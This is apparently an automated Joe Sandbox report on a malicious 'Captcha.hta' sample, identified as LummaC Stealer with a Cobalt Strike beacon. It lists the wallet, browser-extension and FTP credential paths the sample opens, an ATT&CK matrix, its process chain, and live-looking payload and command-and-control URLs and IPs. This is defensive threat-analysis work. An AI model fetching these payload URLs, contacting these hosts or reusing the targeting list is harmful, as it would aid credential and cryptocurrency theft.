                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4103780633.00000000058D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts22
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Deobfuscate/Decode Files or Information
                      2
                      OS Credential Dumping
                      11
                      File and Directory Discovery
                      Remote Services1
                      Archive Collected Data
                      11
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API
                      Boot or Logon Initialization Scripts111
                      Process Injection
                      31
                      Obfuscated Files or Information
                      LSASS Memory23
                      System Information Discovery
                      Remote Desktop Protocol31
                      Data from Local System
                      21
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Exploitation for Client Execution
                      Logon Script (Windows)Logon Script (Windows)1
                      DLL Side-Loading
                      Security Account Manager321
                      Security Software Discovery
                      SMB/Windows Admin Shares1
                      Screen Capture
                      3
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      Command and Scripting Interpreter
                      Login HookLogin Hook1
                      Masquerading
                      NTDS21
                      Virtualization/Sandbox Evasion
                      Distributed Component Object Model1
                      Email Collection
                      124
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts2
                      PowerShell
                      Network Logon ScriptNetwork Logon Script21
                      Virtualization/Sandbox Evasion
                      LSA Secrets1
                      Process Discovery
                      SSH2
                      Clipboard Data
                      Fallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
                      Process Injection
                      Cached Domain Credentials1
                      Application Window Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573886 Sample: Captcha.hta Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 40 immureprech.biz 2->40 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 14 other signatures 2->60 10 mshta.exe 19 2->10         started        signatures3 process4 signatures5 62 Suspicious command line found 10->62 13 cmd.exe 1 10->13         started        process6 signatures7 72 Detected Cobalt Strike Beacon 13->72 74 Bypasses PowerShell execution policy 13->74 16 powershell.exe 15 23 13->16         started        20 curl.exe 1 13->20         started        23 conhost.exe 13->23         started        process8 dnsIp9 34 C:\Users\user\AppData\...\cqvy0dal.cmdline, Unicode 16->34 dropped 36 C:\Users\user\AppData\Local\...\cqvy0dal.0.cs, Unicode 16->36 dropped 46 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 16->46 48 Suspicious execution chain found 16->48 50 Queries memory information (via WMI often done to detect virtual machines) 16->50 52 2 other signatures 16->52 25 RegAsm.exe 16->25         started        29 csc.exe 3 16->29         started        42 147.45.44.131, 49709, 49710, 80 FREE-NET-ASFREEnetEU Russian Federation 20->42 file10 signatures11 process12 dnsIp13 44 immureprech.biz 172.67.207.38, 443, 49711, 49712 CLOUDFLARENETUS United States 25->44 64 Query firmware table information (likely to detect VMs) 25->64 66 Tries to harvest and steal ftp login credentials 25->66 68 Tries to harvest and steal browser information (history, passwords, etc) 25->68 70 Tries to steal Crypto Currency Wallets 25->70 38 C:\Users\user\AppData\Local\...\cqvy0dal.dll, PE32 29->38 dropped 32 cvtres.exe 1 29->32         started        file14 signatures15 process16

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Captcha.hta13%ReversingLabsScript.Virus.Boxter
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dll100%AviraHEUR/AGEN.1300034
                      C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dll100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://147.45.44.131/infopage/nghp.exe0%Avira URL Cloudsafe
                      http://147.45.44.131/infopag4v20%Avira URL Cloudsafe
                      http://pesterbdd.com/images/Pester.png40%Avira URL Cloudsafe
                      https://immureprech.biz/0%Avira URL Cloudsafe
                      https://immureprech.biz/apiP0%Avira URL Cloudsafe
                      awake-weaves.cyou100%Avira URL Cloudmalware
                      http://crl.microsoft0%Avira URL Cloudsafe
                      http://beta.visualstudio.net/net/sdk/feedback.asp0%Avira URL Cloudsafe
                      sordid-snaked.cyou100%Avira URL Cloudmalware
                      http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
                      http://147.45.44.131/infopage/nghp.exeT0%Avira URL Cloudsafe
                      https://immureprech.biz/apiflaU.d0%Avira URL Cloudsafe
                      http://147.45.44.131/infopage/bgfi.ps1V=y0%Avira URL Cloudsafe
                      https://immureprech.biz/api100%Avira URL Cloudmalware
                      immureprech.biz0%Avira URL Cloudsafe
                      https://immureprech.biz/V0%Avira URL Cloudsafe
                      deafeninggeh.biz0%Avira URL Cloudsafe
                      http://147.45.44.131/infopage/bgfi.ps18=S0%Avira URL Cloudsafe
                      http://147.45.44.131/infopage/bgfi.ps18O40%Avira URL Cloudsafe
                      https://go.micro0%Avira URL Cloudsafe
                      debonairnukk.xyz0%Avira URL Cloudsafe
                      http://147.45.44.1310%Avira URL Cloudsafe
                      effecterectz.xyz0%Avira URL Cloudsafe
                      http://www.quovadis.bm00%Avira URL Cloudsafe
                      diffuculttan.xyz0%Avira URL Cloudsafe
                      https://immureprech.biz/pR)D#=0%Avira URL Cloudsafe
                      http://147.45.44.131/infopage/ilk.exe0%Avira URL Cloudsafe
                      http://147.45.4480%Avira URL Cloudsafe
                      http://147.45.44.131/infopage/nghp.exe40%Avira URL Cloudsafe
                      wrathful-jammy.cyou100%Avira URL Cloudmalware
                      https://immureprech.biz:443/apil0%Avira URL Cloudsafe
                      https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
                      https://immureprech.biz:443/api7uiqa8.default-release/key4.dbPK0%Avira URL Cloudsafe
                      http://147.45.44.131/infopage/bgfi.ps10%Avira URL Cloudsafe
                      http://147.45.44.131/infopage/nghp.exeTp0%Avira URL Cloudsafe
                      http://147.45.44.131/infopag40%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      immureprech.biz
                      172.67.207.38
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        sordid-snaked.cyoutrue
                        • Avira URL Cloud: malware
                        unknown
                        http://147.45.44.131/infopage/nghp.exetrue
                        • Avira URL Cloud: safe
                        unknown
                        awake-weaves.cyoutrue
                        • Avira URL Cloud: malware
                        unknown
                        immureprech.biztrue
                        • Avira URL Cloud: safe
                        unknown
                        deafeninggeh.biztrue
                        • Avira URL Cloud: safe
                        unknown
                        https://immureprech.biz/apitrue
                        • Avira URL Cloud: malware
                        unknown
                        debonairnukk.xyztrue
                        • Avira URL Cloud: safe
                        unknown
                        diffuculttan.xyztrue
                        • Avira URL Cloud: safe
                        unknown
                        effecterectz.xyztrue
                        • Avira URL Cloud: safe
                        unknown
                        wrathful-jammy.cyoutrue
                        • Avira URL Cloud: malware
                        unknown
                        http://147.45.44.131/infopage/bgfi.ps1true
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://beta.visualstudio.net/net/sdk/feedback.asppowershell.exe, 00000004.00000002.4110820466.00000000708D1000.00000020.00000001.01000000.0000000C.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://pesterbdd.com/images/Pester.png4powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://immureprech.biz/apiPRegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://immureprech.biz/RegAsm.exe, 00000007.00000002.4207908968.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4105365673.0000000006D30000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://147.45.44.131/infopag4v2powershell.exe, 00000004.00000002.4100255079.0000000004DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://crl.microsoftRegAsm.exe, 00000007.00000002.4207908968.0000000000E11000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4105365673.0000000006D30000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://immureprech.biz/apiflaU.dRegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://go.micropowershell.exe, 00000004.00000002.4100255079.000000000504B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://147.45.44.131/infopage/bgfi.ps1V=ycurl.exe, 00000003.00000002.4070019768.000000000318B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://147.45.44.131/infopage/bgfi.ps18=Scurl.exe, 00000003.00000002.4070019768.000000000318B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://147.45.44.131/infopage/nghp.exeTpowershell.exe, 00000004.00000002.4105665571.0000000006DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://contoso.com/Licensepowershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://contoso.com/Iconpowershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://immureprech.biz/VRegAsm.exe, 00000007.00000002.4210634675.0000000003379000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.apache.org/licenses/LICENSE-2.0.html4powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4105365673.0000000006D30000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://147.45.44.131/infopage/bgfi.ps18O4curl.exe, 00000003.00000002.4070019768.0000000003180000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://147.45.44.131powershell.exe, 00000004.00000002.4100255079.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4100255079.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://147.45.448powershell.exe, 00000004.00000002.4100255079.0000000004A7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://147.45.44.131/infopage/ilk.exepowershell.exe, 00000004.00000002.4100255079.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4100255079.0000000004A38000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://github.com/Pester/Pester4powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.4100255079.00000000046E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://147.45.44.131/infopage/nghp.exe4powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://contoso.com/powershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://immureprech.biz/pR)D#=RegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.quovadis.bm0powershell.exe, 00000004.00000002.4098845897.000000000053E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000DB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://immureprech.biz:443/api7uiqa8.default-release/key4.dbPKRegAsm.exe, 00000007.00000002.4210550709.0000000003365000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://ocsp.quovadisoffshore.com0powershell.exe, 00000004.00000002.4098845897.000000000053E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000DB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.4100255079.00000000046E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://immureprech.biz:443/apilRegAsm.exe, 00000007.00000002.4210550709.0000000003365000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://147.45.44.131/infopag4powershell.exe, 00000004.00000002.4100255079.0000000004DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://147.45.44.131/infopage/nghp.exeTppowershell.exe, 00000004.00000002.4105665571.0000000006DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              147.45.44.131
                                              unknownRussian Federation
                                              2895FREE-NET-ASFREEnetEUtrue
                                              172.67.207.38
                                              immureprech.bizUnited States
                                              13335CLOUDFLARENETUStrue
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1573886
                                              Start date and time:2024-12-12 17:31:56 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 5m 15s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                              Run name:Suspected VM Detection
                                              Number of analysed new started processes analysed:8
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:Captcha.hta
                                              Detection:MAL
                                              Classification:mal100.phis.troj.spyw.expl.evad.winHTA@14/10@1/2
                                              EGA Information:
                                              • Successful, ratio: 33.3%
                                              HCA Information:
                                              • Successful, ratio: 97%
                                              • Number of executed functions: 44
                                              • Number of non-executed functions: 101
                                              Cookbook Comments:
                                              • Found application associated with file extension: .hta
                                              • Stop behavior analysis, all processes terminated
                                              • Execution Graph export aborted for target mshta.exe, PID 2492 because there are no executed function
                                              • Execution Graph export aborted for target powershell.exe, PID 5040 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: Captcha.hta
                                              TimeTypeDescription
                                              11:33:55API Interceptor24x Sleep call for process: powershell.exe modified
                                              11:33:59API Interceptor8x Sleep call for process: RegAsm.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              147.45.44.131Captcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                              • 147.45.44.131/infopage/ung0.exe
                                              EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                                              • 147.45.44.131/infopage/vsom.exe
                                              MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                                              • 147.45.44.131/infopage/Tom.exe
                                              ZjH6H6xqo7.exeGet hashmaliciousLummaCBrowse
                                              • 147.45.44.131/infopage/tvh53.exe
                                              nlJ2sNaZVi.exeGet hashmaliciousLummaCBrowse
                                              • 147.45.44.131/infopage/tbh75.exe
                                              TZ33WZy6QL.exeGet hashmaliciousLummaCBrowse
                                              • 147.45.44.131/infopage/tbg9.exe
                                              7IXl1M9JGV.exeGet hashmaliciousLummaCBrowse
                                              • 147.45.44.131/infopage/tbg9.exe
                                              7IXl1M9JGV.exeGet hashmaliciousUnknownBrowse
                                              • 147.45.44.131/infopage/bhdh552.ps1
                                              Rechnung_643839483.pdf.lnkGet hashmaliciousUnknownBrowse
                                              • 147.45.44.131/infopage/cdeea.exe
                                              172.67.207.38http://gerxx.ruGet hashmaliciousUnknownBrowse
                                                https://tdazl.fgfhgjyukh.top/?jul=17Y2Fzc2FuZHJhLmFwbGV5QHRoZXJtb2Zpc2hlci5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                  No context
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CLOUDFLARENETUShttps://t.co/srDcIXmUyAGet hashmaliciousUnknownBrowse
                                                  • 172.66.0.227
                                                  https://docs.google.com/presentation/d/e/2PACX-1vRMxSBYgTIj7bH-OYJSKudpxaekmSD6B-b603kyy-2ygb7TXyfRQC-hU8fjYDSrrObCUBq88ZmRswwh/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                  • 172.67.134.110
                                                  NOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdfGet hashmaliciousUnknownBrowse
                                                  • 162.247.243.29
                                                  file.exeGet hashmaliciousVidarBrowse
                                                  • 172.64.41.3
                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 104.21.79.7
                                                  MOV-4106720318-MMS028.mp4.htmlGet hashmaliciousUnknownBrowse
                                                  • 104.17.25.14
                                                  zapret.exeGet hashmaliciousUnknownBrowse
                                                  • 104.26.12.205
                                                  https://forms.office.com/e/YpaL2Dw0r2Get hashmaliciousUnknownBrowse
                                                  • 104.17.25.14
                                                  https://connect-velocity-33392.my.salesforce-sites.com/helpGet hashmaliciousUnknownBrowse
                                                  • 104.26.10.50
                                                  phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                                                  • 162.159.140.237
                                                  FREE-NET-ASFREEnetEUCaptcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                  • 147.45.44.131
                                                  EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 147.45.44.131
                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                  • 193.233.202.23
                                                  Wh2c6sgwRo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  • 147.45.47.151
                                                  installer.exeGet hashmaliciousUnknownBrowse
                                                  • 193.233.254.0
                                                  installer.exeGet hashmaliciousUnknownBrowse
                                                  • 193.233.254.0
                                                  MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                                                  • 147.45.44.131
                                                  tyhkamwdmrg.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 147.45.47.81
                                                  kyhjasehs.exeGet hashmaliciousDCRatBrowse
                                                  • 147.45.47.156
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                  • 172.67.207.38
                                                  ZzS8KjNjr7.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                  • 172.67.207.38
                                                  Szi2WJUKmv.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                  • 172.67.207.38
                                                  aYxpioi6G3.exeGet hashmaliciousLummaCBrowse
                                                  • 172.67.207.38
                                                  PGkSZbFKmI.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                  • 172.67.207.38
                                                  HUMpaHS1WZ.exeGet hashmaliciousLummaCBrowse
                                                  • 172.67.207.38
                                                  FAz4V7wbYU.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                  • 172.67.207.38
                                                  hmFHoD7ODu.exeGet hashmaliciousLummaCBrowse
                                                  • 172.67.207.38
                                                  yiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                  • 172.67.207.38
                                                  m9WtCz2n9I.exeGet hashmaliciousLummaCBrowse
                                                  • 172.67.207.38
                                                  No context
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):0.34726597513537405
                                                  Encrypted:false
                                                  SSDEEP:3:Nlll:Nll
                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
